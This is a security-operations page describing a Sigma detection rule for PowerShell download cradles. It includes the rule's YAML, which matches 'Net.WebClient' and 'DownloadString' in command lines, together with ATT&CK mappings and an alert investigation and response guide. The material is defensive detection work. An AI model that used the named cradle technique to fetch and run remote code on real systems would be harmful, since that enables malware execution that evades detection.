MicroSOC
MB

Muath Al Badi

Security Analyst

Suspicious PowerShell Download Cradle

Detection Details
Comprehensive information about this detection rule

Description

This detection identifies PowerShell commands that contain download cradle patterns. Download cradles are techniques used to download and execute code directly in memory, bypassing file-based detection mechanisms. Attackers frequently use these patterns to retrieve malicious payloads from remote servers and execute them without writing to disk. This detection looks for common download cradle patterns such as Net.WebClient, Invoke-WebRequest, and other download methods combined with execution techniques.

Detection Details

Tool
Sigma
Category
Sigma
Severity
High
Status
Active

Metadata

ID
SIGMA-002
Author
Nasser Al Riyami
Last Updated
2023-11-12

MITRE ATT&CK Techniques

T1059.001-Command and Scripting Interpreter: PowerShell
T1105-Ingress Tool Transfer

False Positives

  • Legitimate administrative scripts that download and execute code
  • Software deployment and update processes
  • Security tools and scanners
Detection Rule
View and export the detection rule

Tool-Specific Rule Format

title: Suspicious PowerShell Download Cradle
id: SIGMA-002
status: active
description: Detects PowerShell download cradles that are commonly used to download and execute malicious code.
author: Nasser Al Riyami
date: 2023-11-12
modified: 2023-11-12
tags:
    - attack.t1059.001
    - attack.t1105
logsource:
    product: windows
    service: powershell
detection:
    selection:
        CommandLine|contains|all:
            - 'powershell'
            - 'Net.WebClient'
            - 'DownloadString'
    condition: selection
falsepositives:
    - Legitimate administrative scripts that download and execute code
    - Software deployment and update processes
    - Security tools and scanners
level: high

Implementation Notes

This Sigma rule can be converted to various SIEM and EDR platforms using the Sigma converter. The rule detects specific patterns that may indicate malicious activity. Consider adding additional context or filters to reduce false positives in environments where these patterns might appear in legitimate use cases.

Alert Details

View Detection Rule
Investigation Guide
Step-by-step guide for investigating alerts

Why This Alert Fired

This Sigma rule detected detects powershell download cradles that are commonly used to download and execute malicious code.

Investigation Steps

  1. Identify which log source triggered the Sigma rule
  2. Review the raw log data that matched the detection criteria
    • Look for unusual patterns or deviations from normal behavior
    • Check if the activity is consistent with the user's role and typical activities
  3. Examine the context surrounding the matched event
  4. Check for related events using the same techniques or tactics
  5. Verify if the activity is consistent with normal operations

True Positive Indicators

  • Activity matches known malicious patterns
  • Unusual execution context or parameters
  • Activity from unexpected users or systems
  • Correlation with other suspicious events

False Positive Indicators

  • Legitimate administrative scripts that download and execute code
  • Software deployment and update processes
  • Security tools and scanners

Recommended Response Actions

This is a high-severity detection and requires immediate attention.

  1. Isolate affected systems from the network
  2. Capture forensic evidence before any remediation
  3. Reset credentials for any compromised accounts
  4. Block any identified malicious IPs/domains at the firewall
  5. Initiate incident response procedures

Documentation & Evidence Collection

  • Document all investigation steps and findings in the case management system
  • Capture screenshots of relevant events and timelines
  • Export raw logs and preserve them as evidence
  • Document any systems accessed and actions taken during investigation
  • Record all remediation actions if a true positive is confirmed